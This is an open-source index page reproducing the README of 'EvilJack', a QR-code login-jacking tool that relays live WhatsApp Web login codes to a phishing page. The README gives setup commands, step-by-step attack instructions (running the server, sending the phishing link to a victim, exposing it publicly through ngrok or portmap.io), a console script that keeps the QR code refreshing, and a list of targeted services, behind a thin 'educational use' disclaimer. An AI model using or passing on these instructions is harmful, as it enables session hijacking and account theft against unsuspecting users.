Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/swagkarna/eviljack

QRLJacking A New Form of qr code phishing
https://github.com/swagkarna/eviljack

hacking hacking-tool phishing phishing-attacks qrljacking whatsapp

Last synced: about 2 hours ago
JSON representation

QRLJacking A New Form of qr code phishing

Host: GitHub
URL: https://github.com/swagkarna/eviljack
Owner: swagkarna
License: mit
Created: 2023-07-27T17:00:28.000Z (over 1 year ago)
Default Branch: main
Last Pushed: 2024-04-01T14:59:21.000Z (8 months ago)
Last Synced: 2024-04-01T16:05:04.475Z (8 months ago)
Topics: hacking, hacking-tool, phishing, phishing-attacks, qrljacking, whatsapp
Language: HTML
Homepage:
Size: 2.73 MB
Stars: 41
Watchers: 3
Forks: 11
Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE

Awesome Lists containing this project

README

        






  



 



 

 ---

 * **If you like the tool and for my personal motivation so as to develop other tools please  leave a +1 star** 

  ---

## What is QRLJacking?

---  

QRLJacking, also known as Quick Response Code Login Jacking, is a straightforward yet highly malicious attack method that targets applications utilizing the "Login with QR code" feature as a supposedly secure means of account access. The primary objective of this attack is to hijack users' sessions, enabling attackers to gain unauthorized access to their accounts

---

## Installation ☑️

```

python -m venv venv

venv\Scripts\activate

pip install pyautogui pyzbar Pillow Flask pyocr pytesseract

```

If you get dll error in pyzbar module visit this site:

https://stackoverflow.com/questions/64570443/q-how-to-fix-the-missing-dependancies-in-pyzbar

## Requirements 🧾



To install Tesseract OCR on Windows, follow these steps:

- Download the Tesseract OCR Installer:

- Visit the Tesseract OCR GitHub page: https://github.com/tesseract-ocr/tesseract

- Scroll down to the "Downloads" section and click on "tesseract-ocr-w64-setup-v5.x.x.exe" (where "x.x" represents the version number) to download the Windows installer for Tesseract OCR.

## Run the Tesseract Installer

- Double-click on the downloaded "tesseract-ocr-w64-setup-v5.x.x.exe" file to run the installer.

- Choose Components (Optional)

During the installation, you will be asked to select the components to install. You can keep the default options or customize them based on your needs. At a minimum, make sure the "Tesseract OCR" component is selected.

- Set Installation Path (Optional)

The installer will prompt you to choose an installation directory. You can keep the default or specify a different one. If you change the path, make sure to remember it for later steps.

## Add Tesseract to path 

### Just add the folder to the Path under Windows (not sure with Win7)

- Control Panel > System and Security > System >

- Advanced system settings > Advanced > Environment variables > PATH > New

#### Add this to path 

```

C:\Program Files\Tesseract-OCR

```





### Note : After adding Tesseract-OCR to path make sure to restart your pc

---

## EvilJack in Action 

---

- Run evil_jack.py and server.py 

- Open web.whatsapp.com in a separate window in your browser. Note: Do not close or minimize the window because EvilJack will continuously take screenshots of the QR code on web.whatsapp.com and send them to our phishing page. 

- Now send the phishing link `127.0.0.1:5000` to victim . Note the link `127.0.0.1:5000` only work if victim connected to same network .To perform the attack outside the wan use ngrok or portmap.io 

- After the victim scans the code, you will gain access to his WhatsApp session. Additionally, after the victim has scanned the QR code, he will be automatically redirected to a fake verification page

---

### PortForwarding with portmap.io

### Note : Make sure you forward Port:5000 in portmap.io

---

## Screenshots 



   

   

   

   

   

   

   

   

--- 

## EvilJack Demo   

https://github.com/swagkarna/EvilJack/assets/46685308/77fd0f85-8f85-47f3-a4fd-a6ffca758cde

---

###  script  to auto click the QR code reload element on whatsappweb

Open chrome/firefox and navigate to `console tab` from developer option and paste the following code

```

function checkAndClickButton() {

  const button = document.querySelector('.Jht5u');

  if (button) {

    button.click();

  }

}

// Set an interval to periodically check and click the button (e.g., every 5 seconds)

setInterval(checkAndClickButton, 2000);

```

## EvilJack tested on following sites 

- [X] Whatsapp

- [X] Telegram

- [X] Discord

- [X] steam

- [X] AirDroid

- [X] Tiktok 

---

## Disclaimer ⚠️

swagkarna Provides no warranty and will not be responsible for any direct or indirect damage caused by this tool.


  EVILJACK is built for Educational and Internal use ONLY.